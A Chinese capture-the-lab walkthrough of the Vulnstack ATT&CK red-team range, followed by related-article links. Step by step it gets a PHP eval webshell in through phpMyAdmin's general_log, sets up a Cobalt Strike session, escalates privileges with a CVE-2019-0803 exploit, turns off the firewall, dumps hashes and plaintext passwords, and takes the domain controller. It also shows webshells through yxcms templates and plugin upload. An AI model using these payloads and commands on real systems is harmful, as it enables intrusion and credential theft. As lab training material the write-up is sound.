文章目录

  • 写在前面
  • 拿下webshell
  • 简单信息搜集
  • CS上线
  • 继续信息搜集
  • 提权
  • 攻击域-接管整个域
  • 完结撒花
  • 题外操作
    • 其他拿webshell姿势
      • 修改模板拿shell
      • 插件上传拿shell

@Author:Y4tacker

写在前面

无聊,再玩一个靶场,顺便记录下,也学了一些新东西,当然我觉得我的整个过程还是很有逻辑性的

拿下webshell

打开网站以后发现是个php探针,没啥意义,除了试一试弱口令

同时使用dirsearch扫描

发现有phpmyadmin,尝试为弱口令root\root

查询SHOW VARIABLES LIKE "%SECURE%"

发现配置未开启,那么不能使用into outfile写马进去

SHOW VARIABLES LIKE "%general%"发现·general_log·未开启了,那么开启了改日志路径写马即可

执行set global general_log_file="C:/phpStudy/WWW/1.php"

执行SET GLOBAL general_log='on'

接下来执行SELECT '<?php eval($_POST[1]);?>

连接成功,执行命令

但是现在有个很尴尬的问题,就是有其他字符不能用蚁剑连接,那制作一个干净的shell

那么执行1=file_put_contents("y4tacker.php",base64_decode("PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B"));

简单信息搜集

接下来去蚁剑终端执行命令收集下信息

C:\phpStudy\WWW> whoami
god\administrator

执行ipconfig,发现两个网卡,一个内网一个外网

查看当前登录域及登录用户信息

C:\phpStudy\WWW> net config Workstation
计算机名                     \\STU1
计算机全名                   stu1.god.org
用户名                       Administrator
工作站正运行于               NetBT_Tcpip_{4DAEBDFD-0177-4691-8243-B73297E2F0FF} (000C29E78EDC)NetBT_Tcpip_{55ECD929-FBB2-4D96-B43D-8FFEB14A169F} (000C29E78EE6)NetBT_Tcpip_{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C} (02004C4F4F50)
软件版本                     Windows 7 Professional
工作站域                     GOD
工作站域 DNS 名称            god.org
登录域                       GOD

发现有三台工作主机

工作站域为god,域DNS名称god.org

看看域控

C:\phpStudy\WWW> net group "domain controllers" /domain
这项请求将在域 god.org 的域控制器处理。
组名     Domain Controllers
注释     域中所有域控制器
成员
-------------------------------------------------------------------------------
OWA$

以及查看域管

C:\phpStudy\WWW> net group "domain admins" /domain
这项请求将在域 god.org 的域控制器处理。
组名     Domain Admins
注释     指定的域管理员
成员
-------------------------------------------------------------------------------
Administrator            OWA$

查看域成员,没结果那么等下cs上线好了,这个终端不太好用

C:\phpStudy\WWW> net view /domain:god

结果是

CS上线

创建一个监听器

搞一个马,准备上线了

利用蚁剑上传执行

上线成功

继续信息搜集

查看主机名

shell hostname

查看用户列表

shell net users


shell net localgroup administrators得到
Administrator
liukaifeng01
命令成功完成。

提权

接下来提权吧

通过执行systeminfo

修补程序:         安装了 4 个修补程序。                  [01]: KB2534111                  [02]: KB2999226                  [03]: KB958488                  [04]: KB976902

尝试

shell CVE-2019-0803.exe cmd "start web.exe"

成功

接下里看看

shell tasklist

并没有开启啥防护软件

查看防火墙状态,执行发现开启了不截图了

shell netsh firewall show state

关闭防火墙

shell netsh advfirewall set allprofiles state off

攻击域-接管整个域

查看当前域内计算机列表

net view

看到成功列出

查看域控列表

net dclist

抓取凭证

hashdump

获得明文

logonpasswords

部分截图

创建smb监听器

拿下了OWA域控

同理,不过这次session换成刚拿下的OWA

完结撒花

整个域沦陷

题外操作

其他拿webshell姿势

额,我们也进去看到了目录,不仅仅有phpmyadmin,可以看到这里还有一个之前扫描仪没扫到的yxcms

beifen.rar真有你的

访问看到后台地址与密码

后台访问http://xxx/yxcms/?r=admin

修改模板拿shell

看到修改模板的闭着眼睛都知道怎么搞

测试下没毛病

插件上传拿shell

首先经过我的简单测试是有一些小校验的,小问题,导出他自己的插件并点击卸载

简简单单测试个phpinfo();

修改上传,拿下,太简单了没啥意义的东西

然后呢看看源码也是很简单的,包括zip目录校验啥的不解读了,没过率

[渗透测试]ATTCK实战 | Vulnstack 红队(一)相关推荐

  1. [VulnStack] ATTCK实战系列—红队实战(二)

    文章目录 0x00 环境搭建 0x01 信息收集 端口探测 目录扫描 0x02 漏洞利用 0x03 内网收集 主机信息搜集 域信息收集 内网漏洞扫描 0x04 横向渗透 MS17-010 PsExec ...

  2. ATTCK实战系列——红队实战(—)

    ATT&CK实战系列--红队实战(-) 文章目录 ATT&CK实战系列--红队实战(-) 前言 一.环境搭建 1.1 靶场下载 1.2 网卡配置 二.外网渗透 三.内网渗透 1. 尝试 ...

  3. ATTCK实战系列——红队实战(五)

    ATT&CK实战系列--红队实战(五) 文章目录 ATT&CK实战系列--红队实战(五) 前言 靶场搭建 网络配置 外网渗透 内网渗透 内网信息收集 msf反弹shell 设置路由 探 ...

  4. ATTCK实战系列——红队实战(一)

    文章目录 环境搭建 渗透测试部分 phpmyadmin 日志 getshell yxcms 前端 XSS 任意文件写入 getshell 任意文件删除 后渗透阶段 域控信息收集 域外信息收集与渗透 3 ...

  5. ATTCK实战系列-红队评估(三)WP

    环境搭建 靶机下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/5/ 将虚拟机下载下来后按照官方说明配置好网络环境即可开始测试 渗透流程 0x01 ...

  6. ATTCK实战系列—红队实战-4

    0.靶场介绍 靶场下载.配置参考:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 靶场配置后需要自行开启 vulhub 里面的三个漏洞. 1.信息收 ...

  7. ATTCK实战系列 —— 红队实战(三)

    环境准备 网络拓扑图 外网网段:172.26.239.0/24 内网网段:192.168.93.0/24 主机 外网 内网 Centos 172.26.239.89 192.168.93.100 Ub ...

  8. 记ATTCK实战系列——红队实战(三)红日靶场

    以下操作均在测试环境进行,遵章守法 靶场镜像地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/5/ 20G左右,分为5个虚拟机,下载之后分别解压,导进 ...

  9. 2021暗月web渗透测试攻防全栈红队视频教程网络安全程师ctf学习

    欢迎一起交流技术学习! https://pan.baidu.com/s/1fbYGyv029oC5gf4j5FQteA?pwd=1234

  10. 渗透测试-信息打点(红队工具篇)

    0x00 介绍 finger项目(fofa&&350queke) 知道创宇:kunyu项目(zoomeye&&seebug) ARL灯塔项目:资产灯塔项目 自动化信息收 ...

最新文章

  1. Blender写实建筑场景制作学习教程 Exterior Visualization in Blender 2.9
  2. php手机定位导航,js实现网页定位导航功能
  3. 测试人员的独特价值体会
  4. linux c printf 不能输出
  5. python中main的作用_浅析python 中__name__ = '__main__' 的作用
  6. 【cJSON】CJSON学习笔记(二)
  7. 使用maven导入任意jar包
  8. 从编程语言排行来看:C/C++一直占有前三之位,为何C++不会消亡?
  9. Delphi中Sender对象的定义
  10. 19.1.27 laravel框架学习笔记
  11. Sublime Text 3 插件和python环境
  12. 语音 AI 技术简介
  13. 小朋友适合读增广贤文么,增广贤文适合多大的孩子看?
  14. Vector、Sort课后题解
  15. 微信小程序:简单舒服新UI装逼制作神器
  16. 如何计算用户生命周期天数?
  17. 计算机组成原理静态存储器实验报告,静态随机存储器实验报告计算机组成原理...
  18. mysql导入数据库之后触发器没有权限_MYSQL设置触发器权限问题的解决方法
  19. 树与图在索引上的区别
  20. 闲话复数(1) | 不现实的虚数 i 为什么虚?它长成什么样?

热门文章

  1. 笔记本打印机显示服务器脱机,打印机显示脱机状态怎么办 打印机显示脱机状态解决方法【详解】...
  2. 基于Java实现的毕业设计论文选题系统
  3. 公共场合的wifi 靠不住
  4. 帝国cms后台界面修改方法 最新版教程
  5. BP反向传播算法原理及公式推导
  6. java 组合问题_java数组排列组合问题汇总
  7. 计算机死机的重启方法,电脑死机怎么强制重新启动
  8. python通过周数得到日期_python中根据时间获取周数,通过周数获取时间
  9. JAVA日期转换函数(包括:日期、周数的计算)
  10. 利用Oracle RDA( Remote Diagnostic Agent)快速收集Oracle产品分析数据